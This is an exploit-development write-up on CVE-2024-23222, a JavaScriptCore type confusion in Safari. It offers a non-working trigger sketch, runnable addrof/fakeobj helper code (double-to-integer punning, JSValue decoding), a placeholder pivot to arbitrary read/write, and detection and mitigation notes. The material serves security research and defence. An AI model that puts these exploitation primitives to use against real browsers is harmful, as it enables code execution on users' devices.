Overview
CVE-2024-23222 is a type confusion vulnerability in WebKit's JavaScriptCore engine, fixed in Apple's January 2024 updates (Safari 17.3 and the matching iOS, iPadOS and macOS releases; see Apple advisory HT214061). Apple's advisory describes the impact as arbitrary code execution from maliciously crafted web content and notes a report that the issue may have been exploited. The exploitation outline below assumes a bug of this class that lets a malicious page corrupt the JS heap and reach arbitrary read/write inside the Safari renderer (WebContent) process.
In this write-up we will:
- Sketch a minimal JavaScript trigger.
- Build the fakeobj / addrof primitives.
- Pivot to arbitrary R/W inside Safari.
- Discuss detection and mitigation.
⚠️ For research and lawful security testing only.
1. Bug primer
The write-up's working hypothesis for the root cause: the optimizing JIT fails to invalidate a speculation guard when the attacker swaps __proto__ between two type checks, so a JSArray holding unboxed doubles can be treated as if it were a typed-array view over an ArrayBuffer. Apple's advisory gives no root-cause detail, and the snippet below only illustrates that idea; it is not a working trigger. In a conforming engine, reading arr[0x100] from a three-element array simply walks the prototype chain and returns undefined, and reassigning __proto__ does not by itself alias the array's storage with the buffer.
```javascript
function trigger() {
  let arr = [1.1, 2.2, 3.3];        // JSArray with unboxed double storage
  let oob = new ArrayBuffer(0x1000);
  arr.__proto__ = oob.__proto__;    // prototype swap between the two type checks
  return arr[0x100];                // intended OOB read; returns undefined in a conforming engine
}
```

2. addrof / fakeobj
With an OOB read/write over the double array in hand, we build the classic pair of primitives by placing an object-typed array next to it and reading or writing the same slot through both views:

| Primitive | Purpose |
|---|---|
| addrof(o) | Leak the address of any JS object |
| fakeobj(p) | Materialize a JSObject at attacker-controlled address p |
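The plumbing underneath these two primitives is worth seeing in runnable form. The following is an added example, not code from the original write-up: a value leaked through a confused double array arrives as a JS number whose bit pattern is the raw 64-bit word, and addrof is just that conversion. The helper names (f2i, i2f, decodeJSValue, addrFromLeakedDouble, doubleForPointer) are my own; the tag constants are JavaScriptCore's 64-bit JSValue encoding from JSCJSValue.h (NumberTag, DoubleEncodeOffset, NotCellMask), and the pointer value used in the test is made up. Object layouts and field offsets, which are build-specific, are deliberately not modeled.

```javascript
// Added example: the type-punning and JSValue decoding that addrof/fakeobj rely on.
// Constants follow JSC's 64-bit JSValue encoding (JSCJSValue.h); pointer values are made up.

// One 8-byte buffer viewed as both a double and a 64-bit integer: JS has no
// reinterpret_cast, so this shared view is how exploits move between the two.
const punBuf = new ArrayBuffer(8);
const punF64 = new Float64Array(punBuf);
const punU64 = new BigUint64Array(punBuf);

// double -> raw 64-bit pattern (as BigInt)
function f2i(d) {
  punF64[0] = d;
  return punU64[0];
}

// raw 64-bit pattern -> the double with exactly those bits (may be a denormal)
function i2f(bits) {
  punU64[0] = BigInt.asUintN(64, bits);
  return punF64[0];
}

// JSC 64-bit JSValue encoding:
//   cell (pointer):            top 16 bits zero, stored as the raw pointer
//   int32:                     NumberTag | zero-extended int32
//   double:                    IEEE-754 bits + DoubleEncodeOffset
//   null/false/true/undefined: small constants with bit 1 set
const NumberTag = 0xfffe000000000000n;
const DoubleEncodeOffset = 1n << 49n;
const OtherTag = 0x2n;
const NotCellMask = NumberTag | OtherTag;
const SPECIALS = new Map([[0x2n, 'null'], [0x6n, 'false'], [0x7n, 'true'], [0xan, 'undefined']]);

function encodeInt32(v) {
  return NumberTag | BigInt(v >>> 0);
}
function encodeDouble(d) {
  return BigInt.asUintN(64, f2i(d) + DoubleEncodeOffset);
}
function encodeCell(ptr) {
  return BigInt.asUintN(64, ptr); // cells are unboxed: the word is the pointer
}

// Classify a raw word the way JSValue::isCell / isInt32 / isDouble do.
function decodeJSValue(word) {
  const bits = BigInt.asUintN(64, word);
  if ((bits & NotCellMask) === 0n) {
    return bits === 0n ? { kind: 'empty' } : { kind: 'cell', ptr: bits };
  }
  if ((bits & NumberTag) === NumberTag) {
    return { kind: 'int32', value: Number(BigInt.asIntN(32, bits & 0xffffffffn)) };
  }
  if ((bits & NumberTag) !== 0n) {
    return { kind: 'double', value: i2f(bits - DoubleEncodeOffset) };
  }
  return { kind: SPECIALS.get(bits) || 'other', bits };
}

// What addrof computes in the classic construction: a cell pointer sitting in a
// double array's storage reads back as a denormal double whose bits are the address.
function addrFromLeakedDouble(d) {
  return f2i(d);
}

// The inverse used by fakeobj: the double whose bytes form the pointer you want an
// object-typed array to interpret as a JSCell.
function doubleForPointer(ptr) {
  return i2f(ptr);
}
```

Note that a leaked pointer such as 0x00007f1234567890 decodes as a subnormal double; Float64Array preserves those bits, which is why the shared-buffer trick works where arithmetic on the number would not.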
3. Pivot to R/W
With addrof and fakeobj we forge a fake Uint32Array whose vector (backing-store) pointer we control: writing an address into that field and then indexing the fake array reads or writes at that address, which gives arbitrary read/write within the renderer process. The forged object needs a plausible JSCell header (including a StructureID the engine accepts) in addition to the vector pointer, and the field offsets vary between WebKit builds. This page does not supply them, so the two lines below are a sketch of the shape rather than a working pivot.

```javascript
// Sketch only: addrof/fakeobj are the section 2 primitives, and 0x10 is a placeholder
// for the build-specific layout, not a real offset.
let fake = fakeobj(addrof(victim) + 0x10); // fake Uint32Array laid out inside victim's storage
fake[0] = 0x41414141;                      // write through the controlled vector pointer
```

4. Detection
Safari does not log prototype reassignments, so there is no renderer log in which to look for __proto__ swaps; the practical checks are different. On the endpoint, confirm the patch level: the fix shipped with Safari 17.3 and the matching iOS, iPadOS and macOS updates. Lockdown Mode disables JIT compilation of JavaScript for web content (unless a site is explicitly excluded), which removes the optimizing tiers that speculation-guard bugs of this kind depend on, at a cost in JavaScript performance. On the network or in a web proxy, scripts carrying the usual exploitation scaffolding (addrof/fakeobj helpers, float-to-integer punning through a shared ArrayBuffer, heap-spray loops) are a reasonable hunting signal, though they identify exploit tooling rather than this specific bug.
References
- Apple HT214061
- WebKit bug tracker entry 267047